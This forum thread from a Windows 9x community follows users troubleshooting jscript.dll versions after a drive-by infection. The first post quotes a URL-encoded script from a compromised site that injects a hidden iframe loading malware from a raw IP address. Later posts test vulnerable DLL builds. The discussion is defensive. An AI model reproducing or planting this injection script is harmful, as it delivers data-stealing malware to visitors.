Jump to content

Jscript.dll 5.6.0.8833 problems

eidenk

By eidenk
in Windows 9x Member Projects

 Share

Recommended Posts

eidenk

eidenk

Posted
Posted (edited)

OK so I had jscript.dll 5.6.0.8831 and this script dropped a vm3.exe from 81.95.146.98 in my temp folder which fortunately crashed immediately :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0026)http://www.alchemylab.com/ -->
<script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT>

I did update to jscript.dll 5.6.0.8833 which fixed the above problem but unfortunately it breaks stuff, namely I can't post correctly in boards anymore with it.

On some boards, the edit field does not display at all anymore and here it displays the edit field but none of the formatting stuff at all.

This happens with IE 5.5SP2 KB905915 on WinME.

Any ideas ? Am I missing something in addition to jscript.dll 5.6.0.8833 so that I can post correctly in boards with it ?

Does the problem exist with IE6 as well ?

Edited by eidenk
Link to comment
Share on other sites

erpdude8

erpdude8

Posted
Posted (edited)

Actually, eidenk, version 5.6.0.8833 of JSCRIPT.DLL has MAJOR flaws.

it caused a WinXP crash mentioned here:

http://www.d-a-l.com/help/showthread.php?t=43986

also, version 5.6.0.8833 of JSCRIPT.DLL is incompatible with Win9x/ME/NT4 OSes. the_guy will remove this version of jscript.dll from the WinME service pack in the upcoming beta.

My quote from the ME SP page about jscript.dll v5.6.0.8833-

HOWEVER, I have tested version 5.6.0.8833 of JSCRIPT.DLL and VBSCRIPT.DLL files and they do NOT register under Win98/ME. MDGx is RIGHT about THAT. If these files were from a beta version of Windows Vista then they should NOT be included in future betas of the ME service pack and in unofficial U917344 fix.

try using version 5.6.0.8832 of JSCRIPT.DLL file, which is mentioned in MS article 919237. build 8832 does work fine under Win9x/ME/NT4.

Edited by erpdude8
Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted

Thanks dude, I hadn't followed up the latest devellopements of the service packs lately, but as I saw that this file was now included in most of them I tried it.

I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831.

In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll.

Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.

Link to comment
Share on other sites
erpdude8

erpdude8

Posted
Posted (edited)
I have just read kb919237 about JSCRIPT.DLL 5.6.0.8832. Unfortunately it does not seem to address any security issue over 5.6.0.8831, only a slow performance issue on some page with IE6, and the above script is able to download a file from a website and execute it on my machine with 5.6.0.8831.

In the last six months or so I caught Gromozon/Link Optimizer, Bagle, Haxdoor, lsasss, PurityScan, CnsMin and now this one. All through IE and possibly all through the same flaw in jscript.dll.

Has someone got JSCRIPT.DLL 5.6.0.8832 so that I could try it even though I am pretty sure it won't fix the hole. It should be in MESP Beta6 but I don't have it and the download link is dead.

I have also tested the Alchemylab.com web site on my WinXP SP2 + IE7 system which had JSCRIPT.DLL version 5.7.0.5730. The site works and does not crash but I get Internet Explorer script error message "Unexpected error (0x80070005)". Click on the yellow exclamation mark (!) on the bottom-left hand corner of IE and the script error message will be displayed.

you could try using jscript.dll version 5.7.0.5730 which does register and work under IE6 + Win98/ME. the vm3.exe file wont crash IE but you'll get scripting errors with the Alchemylab.com site

eidenk, I think it's more likely the web page coding is faulty. contact the webmaster of the www.alchemylab.com site and have him fix the code on his site.

Edited by erpdude8
Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted

Thanks erpdude but let's try to clarify :

I have also tested the Alchemylab.com web site on my WinXP SP2 + IE7 system which had JSCRIPT.DLL version 5.7.0.5730. The site works and does not crash but I get Internet Explorer script error message "Unexpected error (0x80070005)". Click on the yellow exclamation mark (!) on the bottom-left hand corner of IE and the script error message will be displayed.

IE does not crash here but a file called vm3.exe is downloaded from a website in Russia and then executed on my machine simply by accesing the Alchemylab.com web site or just by running a local html page in which the above snippet of javascript is included.

Copying/pasting this snippet into notepad, saving as html and then opening it with IE does the same job. Vm3.exe gets downloaded and executed but as it is not compatible with 9x OSes, it crashes itself immediately (IE is not affected) instead of hiding itself and send personal data somewhere on the web as it is supposed to do on an NT OS. According to peeps on the sysinternals forum on which I also posted that stuff, vm3.exe is a data stealer rootkit, meaning that as soon as it is downloaded and executed on a an NT OS, it hides itself from both the file manager and the process manager and attempts to steal personal data from you.

Vm3.exe is actually quite irrelevant to my post. What I am interested in is the javascript exploit that allows this file to be downloaded and executed on my machine without any other interaction than running a web page on which there is this piece of script.

Obviously this script in a modified form would be able to download and execute anything on my machine and possibly screw my system totally by a plethora of possible means. Code exists to erase BIOSes from within windows, damage hardware or totally screw the file system. Any such scenario and others are possible through this javascript exploit.

you could try using jscript.dll version 5.7.0.5730 which does register and work under IE6 + Win98/ME. the vm3.exe file wont crash IE but you'll get scripting errors with the Alchemylab.com site

It is not clear in your post whether this vm3.exe gets downloaded and executed or not on your XP machine with jscript.dll 5.7.0.5730. Bear in mind that, as it is a rootkit, you will not notice it is there (if it is there) through normal means.

It is not clear either whether you actually tried Win98/ME + IE6 + jscript.dll 5.7.0.5730 on that page or just infer what you say from your test with XPSP2 + IE7.

eidenk, I think it's more likely the web page coding is faulty. contact the webmaster of the www.alchemylab.com site and have him fix the code on his site.

No it's not faulty, it is infected with an exploit that at least affects 9x OSes + IE5.5 + JSCRIPT.DLL 5.6.0.8831 and very possibly NT systems also as vm3.exe seems to be targeted exclusively at those systems.

Please could someone post this jscript.dll 5.7.0.5730 so that it can be tried here.

Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted

I bump it because that javascript exploit is very serious stuff IMO and most certainly affects all fully patched 9x systems.

Can someone confirm that a 98SE or ME system with a fully patched IE 6 (SP1 + Maximum Decim Update) is vulnerable to that exploit ?

Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted

Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

Link to comment
Share on other sites
erpdude8

erpdude8

Posted
Posted
Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted
Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.

Link to comment
Share on other sites
Analada

Analada

Posted
Posted
Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.

NOT really, or only if you make a rod for your own back. I mean WHY use IE6? Just use Firefox. If you have to use IE5/6 then do so only on a trusted site.

Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted (edited)
Thanks, I have just tried this jscript.dll 5.7.0.5730 and it is vulnerable to the exploit here.

I only have IE 5.5 installed. Can someone try it with IE6 to see if it makes a difference ?

I get the same thing on my WinME + IE6 SP1 system with jscript.dll v5.7.0.5730

So it means that all our 9x systems are vulnerable to that nasty javascript exploit, no matter how well updated they are.

NOT really, or only if you make a rod for your own back. I mean WHY use IE6? Just use Firefox. If you have to use IE5/6 then do so only on a trusted site.

That's not really an answer to the problem.

Besides, there is no trusted site as any site could be hacked and pages infected with a script like that.

And a rogue chm file from a download or another could also be infected. I have just build one with only that script in it and it is vulnerable.

Edited by eidenk
Link to comment
Share on other sites
eidenk

eidenk

Posted
  • Author
Posted (edited)
If it helps, I can send a copy of jscript.dll from Vista RC2 to see if it fixes the problem.

the_guy

As this vm3.exe is meant to attack NT systems (it crashes on 9x OSes), I believe this javascript vulnerability exists on all MS OSes and versions of IE otherwise it does not make sense to set a trap like that.

Anyway I'll PM you my email so you can send me this Vista jscript.dll for a try.

Edit : Thanks the_guy. Still vulnerable with this build 5.7.0.5744 from Vista RC2.

I bet this exploit also screws the supersecure Vista machines then.

How can we make Microsoft aware so that they fix it ? They have to fix it if it affects also XP and Vista.

Edited by eidenk
Link to comment
Share on other sites
erpdude8

erpdude8

Posted
Posted
If it helps, I can send a copy of jscript.dll from Vista RC2 to see if it fixes the problem.

the_guy

eidenk and the_guy, I think the jscript.dll file from final release of Windows Vista is also vulnerable

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...